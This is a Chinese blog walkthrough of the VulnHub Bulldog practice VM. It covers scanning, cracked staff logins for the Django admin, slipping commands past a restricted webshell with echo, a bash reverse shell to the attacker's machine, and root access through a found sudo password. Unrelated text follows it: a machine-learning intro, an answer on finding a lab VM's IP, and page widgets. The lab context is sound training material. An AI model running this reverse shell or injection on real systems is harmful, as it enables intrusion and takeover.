Vulnhub 渗透练习(三)—— Bulldog

文章介绍了在VirtuallBox中进行环境搭建,通过设置网络为仅主机模式和桥接模式进行靶机连接。执行端口扫描发现开启的23端口,并尝试通过telnet登录。通过目录扫描和源码分析获取到网站信息,利用webshell进行操作,并通过特定命令反弹shell。进一步,文章展示了提权过程,找到sudo密码并使用Python打开新终端以获得root权限。

环境搭建

下载链接

在 virtuallBox 中打开靶机。

virtuallBox 网络连接方式设置为仅主机。
vmware 设置桥接模式的网卡为 VirtualBox Host-Only Ethernet Adapter。
kail 网络适配设置为 NAT 和 桥接。
来自:https://blog.youkuaiyun.com/LYJ20010728/article/details/119395324?spm=1001.2014.3001.5501

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
如果还是有问题最简单的方法就是直接还原网络适配器的默认值。
在这里插入图片描述

信息收集

端口扫描:

开了个 23 端口,如果有账密,直接 telnet 登录。
在这里插入图片描述
目录扫描:
在这里插入图片描述
/admin 提醒要是员工的用户名和密码。
在这里插入图片描述
在 /dev 中有对网站的一些见解,比如这个网站是 Django 等等,有个 webshell 页面,不过要验证,估计有个 cookie 啥的,在源码中还有一串 hash,解密
在这里插入图片描述
用这个登 Django 管理页面看下。

nick@bulldogindustries.com bulldog
sarah@bulldogindustries.com 	bulldoglover

成功
在这里插入图片描述
webshell 可用。
在这里插入图片描述

getshell

虽然说只能运行六个命令,但是我们可以用 echo 绕过。

ifconfig
ls
echo
pwd
cat
rm

在这里插入图片描述
反弹 shell

echo 'bash -i >& /dev/tcp/192.168.56.102/9999 0>&1' | bash

在这里插入图片描述

在这里插入图片描述

提权

在/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp 中找到sudo的密码:SUPERultimatePASSWORDyouCANTget

疑似 root 密码
在这里插入图片描述
提示我们要在终端上,那用 python 打开一个新终端
在这里插入图片描述

成功 root

sudo python -c 'import pty;pty.spawn("/bin/bash")'
SUPERultimatePASSWORDyouCANTget

在这里插入图片描述

根据原作 https://pan.quark.cn/s/459657bcfd45 的源码改编 Classic-ML-Methods-Algo 引言 建立这个项目,是为了梳理和总结传统机器学习(Machine Learning)方法(methods)或者算法(algo),和各位同仁相互学习交流. 现在的深度学习本质上来自于传统的神经网络模型,很大程度上是传统机器学习的延续,同时也在不少时候需要结合传统方法来实现. 任何机器学习方法基本的流程结构都是通用的;使用的评价方法也基本通用;使用的一些数学知识也是通用的. 本文在梳理传统机器学习方法算法的同时也会顺便补充这些流程,数学上的知识以供参考. 机器学习 机器学习是人工智能(Artificial Intelligence)的一个分支,也是实现人工智能最重要的手段.区别于传统的基于规则(rule-based)的算法,机器学习可以从数据中获取知识,从而实现规定的任务[Ian Goodfellow and Yoshua Bengio and Aaron Courville的Deep Learning].这些知识可以分为四种: 总结(summarization) 预测(prediction) 估计(estimation) 假想验证(hypothesis testing) 机器学习主要关心的是预测[Varian在Big Data : New Tricks for Econometrics],预测的可以是连续性的输出变量,分类,聚类或者物品之间的有趣关联. 机器学习分类 根据数据配置(setting,是否有标签,可以是连续的也可以是离散的)和任务目标,我们可以将机器学习方法分为四种: 无监督(unsupervised) 训练数据没有给定...
### 关于VulnHub Bulldog2靶机无法扫描到IP的解决方案 在渗透测试过程中,如果遇到无法通过常规手段扫描到目标主机的情况,可以尝试多种技术组合来定位目标主机。以下是针对此问题的具体分析和建议: #### 使用ARP扫描工具 当标准的`ping`或`nmap`扫描未能发现目标主机时,可以通过局域网内的ARP广播请求找到活动设备。例如,在引用中提到的方法3使用了`netdiscover`命令[^3]: ```bash netdiscover -r 192.168.44.0/24 -i eth0 ``` 上述命令会向指定子网发送ARP请求并监听响应,从而识别出网络中的活跃主机。 #### 调整Nmap参数优化扫描效果 除了传统的ICMP Ping外,还可以利用TCP SYN包或其他协议类型的探测方式提高成功率。比如下面这条指令包含了服务版本检测(-sV),隐秘模式(SYN半开扫描-sS)以及调整时间模板至更快执行速度(T4)[^2]: ```bash nmap -sS -sV -T4 192.168.11.19 ``` 另外值得注意的是,有时防火墙可能阻止来自外部源地址的数据包进入内部网络;因此有必要确认Kali Linux所在环境与Bulldog2 VM之间确实处于同一物理或者逻辑二层交换结构下(即两者能够互相访问对方MAC层面的信息). #### 测试Telnet/TCP连接验证特定端口状态 即使整体Ping不通某个节点,但如果已知其开放的服务端口号,则可以直接发起相应层次上的握手过程来进行判断是否存在可交互对象。正如材料里所描述那样,“尝试远程连接23端口后失败。”这表明虽然telnet未成功建立session,但仍不失为一种排查思路之一[^1]. 综上所述,对于找不到vulnhub bulldog2 IP这一难题,可以从多个角度出发寻找突破口:一方面借助专门设计用于本地网段探索的应用程序如NetDiscover;另一方面灵活运用高级配置选项丰富的侦查利器-NMAP,并辅以其他辅助性操作进一步缩小范围直至最终锁定确切位置。 ```python import os def scan_network(): command = 'netdiscover -r 192.168.44.0/24 -i eth0' result = os.popen(command).read() print(result) scan_network() ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值